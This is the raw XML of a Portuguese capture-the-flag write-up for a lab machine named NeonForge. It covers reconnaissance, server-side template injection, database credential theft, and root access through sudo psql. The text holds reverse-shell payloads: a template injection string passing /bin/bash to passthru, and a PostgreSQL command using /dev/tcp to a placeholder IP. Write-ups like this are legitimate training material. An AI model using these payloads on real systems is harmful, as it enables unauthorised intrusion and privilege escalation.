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360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5b5c155yk6j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82imuf1qm0jp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7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NeonForge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n2cf9ee87b57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Começamos a fase reconhecimento da máquina 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para verificar quais portas estão abertas.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114300" distR="114300">
            <wp:extent cx="5495544" cy="2879876"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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287987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da análise dos resultados da varredura, foi identificado que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(HTTP) encontra-se aberta e acessível no host alvo.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943600" cy="2613263"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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2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enumeração de diretórios e arquivos na aplicação web através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visando identificar recursos e páginas ocultas não disponíveis diretamente na interface web. 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http://ip/FUZZ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495925" cy="2946638"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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77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466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da navegação manual na aplicação web e da análise dos resultados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identificadas duas rotas principais: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/register e /login.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spacing w:after="281" w:before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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Foi possível realizar o registro de uma conta de usuário através da funcionalidade disponível na rota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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /register</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, obtendo acesso autenticado à aplicação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495544" cy="3857449"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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38574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as credenciais criadas anteriormente, foi realizado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 através da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estabelecendo uma sessão autenticada.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1" w:before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 fluxo da aplicação, foi identificado um campo de entrada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(input)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 renderiza o conteúdo fornecido pelo usuário diretamente na interface web.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114300" distR="114300">
            <wp:extent cx="5495544" cy="2474756"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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247475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Após identificar que esse input renderizava todo o conteúdo enviado diretamente na página web, foi possível avaliar a presença de vulnerabilidades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Cross-Site Scripting (XSS)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ou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 Vamos começar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 Para isso, foi testado se a aplicação interpretava expressões matemáticas simples. Ao submeter uma multiplicação básica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7 × 7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) e observar a exibição do resultado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49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, foi possível inferir que a entrada estava sendo interpretada e executada pelo mecanismo de template da aplicação.</w:t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577840" cy="2601203"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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12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resultado retornado pela aplicação foi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que a operação matemática foi processada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engine de template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Este comportamento evidencia a presença da vulnerabilidade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Server-Side Template Injection (SSTI).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577840" cy="2592266"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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922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confirmação da vulnerabilidade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SSTI,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possibilitou-se executar comandos no sistema operacional através da chamada de funções nativas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tais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system, popen, passthru e exec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partir desse ponto, foi possível obter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partir da exploração de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{{['/bin/bash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0&gt;&amp;1"']|map('passthru')}}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070463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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estabelecida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conexão reversa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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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gzb5rrotxqn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3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dos arquivos da aplicação web, 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pela lógica de conexão e interação com o banco de dados.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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arquivo, foi possível identificar a senha de acesso ao banco de dados.</w:t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64000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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conexão ao banco de dados utilizando as credenciais obtidas anteriormente.</w:t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01700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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o usuário do banco de dados possua privilégios elevados, e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esteja habilitado,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torna-se possíve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 explorar essa funcionalidade para executar comandos no sistema operacional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criada uma tabela no banco de dados e, em seguida, foi testada a execução de comandos por meio da funcionalidade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validação, foi utilizado um comando de reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:spacing w:after="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a(output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'/bin/bash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"sh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/dev/tcp/&lt;your-ip&gt;/443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0&gt;&amp;1"';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09600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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maneira, foi obtida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15203380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usuários se encontra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/var/lib/postgresql.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60400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15203380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quais comandos e usuários podiam ser executados sem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exigência de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54100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033807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observado que o usuário possui permissão para executar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/usr/bin/psql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sem necessidade de senha.</w:t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Antes de executar comandos com privilégios elevados, foi necessário configurar o banco de dados. Para isso, definiu-se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foi criada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(tabela)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associada a esse usuário, permitindo a autenticação e a conexão ao banco de dados com privilégios administrativos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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152033807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essas configurações, foi possível realizar a conexão com o banco de dados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</w:t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152033807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os comandos eram executados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invocar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nesse mesmo contexto, resultando na obtenção de privilégios administrativos completos no sistema. Site de referência: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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https://gtfobins.github.io/gtfobins/psql/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152033807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root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14975" cy="552450"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033807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52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headerReference r:id="rId32" w:type="even"/>
      <w:footerReference r:id="rId33" w:type="default"/>
      <w:footerReference r:id="rId34" w:type="first"/>
      <w:footerReference r:id="rId3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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6036q26k2cpk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520338063" name="image9.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic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/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.75pt;height:793.5pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-74.0pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.25pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image1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52033807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52033805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NeonForge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52033805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5pt;height:793.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705BA671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image" Target="media/image23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0.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/psql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hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/299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5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml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8.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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HEjueSM1re5kSKN/3KaR4BZBg==">CgMxLjAyDmguNWI1YzE1NXlrNmo1Mg5oLjgyaW11ZjFxbTBqcDIOaC5uMmNmOWVlODdiNTcyDmguZ3piNXJyb3R4cW5pMg5oLjYwMzZxMjZrMmNwazgAciExaHUyb3Y5TkRzZlZybE9wMDlUZkFNcVVxNXhoVGFSai0=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2025-10-31T11:54:00.0000000Z</dcterms:created>
</cp:coreProperties>
</file>